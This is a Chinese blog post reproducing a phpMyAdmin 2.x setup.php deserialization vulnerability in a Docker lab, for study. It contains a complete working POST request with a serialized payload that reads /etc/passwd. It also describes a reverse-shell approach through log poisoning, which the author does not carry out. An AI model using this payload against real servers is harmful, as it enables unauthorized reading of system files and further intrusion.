网站首页 > 开源技术 正文
phpMyadmin是一套开源的、基于Web的Mysql数据库管理工具。这个实验利用php的反序列化实现了任意文件读取,影响的版本是phpMyAdmin 2.x,然鹅,令人激动的是网上有师傅分享了利用该漏洞实现了反弹shell,思路是先访问出错,让access.log或者error.log记录出错信息,然后在利用反序列化读取access.log或者error.log文件中的代码,实现反弹shell,心动不如行动~
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
前提:准备好docker环境,下载好书籍配套实验环境,进入目录 ,开始复现漏洞
- docker-compose build //可选
- docker-compose up -d
完成试验后,记得删除漏洞环境哦~~
- docker-compose down
- docker system prune -a -f //可选
简单访问一下,说明phpMyAdmin scripts:setup.php 反序列化漏洞(WooYun-2016-199433)环境搭建成功了
掏出burpsuite准备发一个POST请求,获取etc目录下的passwd文件内容
POST /scripts/setup.php HTTP/1.1
Host: 144.34.162.13:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
由于这个实验中,无法记录请求,因此,就没有继续复现反弹shell了
猜你喜欢
- 2025-04-08 MySQL8安装 八: 使用phpMyadmin客户端
- 2025-04-08 phpMyAdmin导入文件过大超出限制的解决
- 2025-04-08 一个比phpmyadmin更好的在线数据库管理工具
- 2025-04-08 群晖NAS安装MySQL数据库及phpMyAdmin实现远程管理本地数据库
- 2025-04-08 数据库管理工具:彻底放弃phpMyAdmin,转投更加轻便的Adminer
- 2024-08-22 laravel-admin 图片列表图片放大(laravel admin demo)
- 2024-08-22 django-adminstartmyproject创建应用
- 2024-08-22 Spring Boot 2.0+Mybatis+Vue的轻量级后台管理系统
- 2024-08-22 Centos-通过yum快速升级PHP版本(centos升级python3)
- 2024-08-22 Centos7 下安装phpmyadmin(centos安装php5.6)
你 发表评论:
欢迎- 最近发表
- 标签列表
-
- jdk (81)
- putty (66)
- rufus (78)
- 内网穿透 (89)
- okhttp (70)
- powertoys (74)
- windowsterminal (81)
- netcat (65)
- ghostscript (65)
- veracrypt (65)
- asp.netcore (70)
- wrk (67)
- aspose.words (80)
- itk (80)
- ajaxfileupload.js (66)
- sqlhelper (67)
- express.js (67)
- phpmailer (67)
- xjar (70)
- redisclient (78)
- wakeonlan (66)
- tinygo (85)
- startbbs (72)
- webftp (82)
- vsvim (79)
本文暂时没有评论,来添加一个吧(●'◡'●)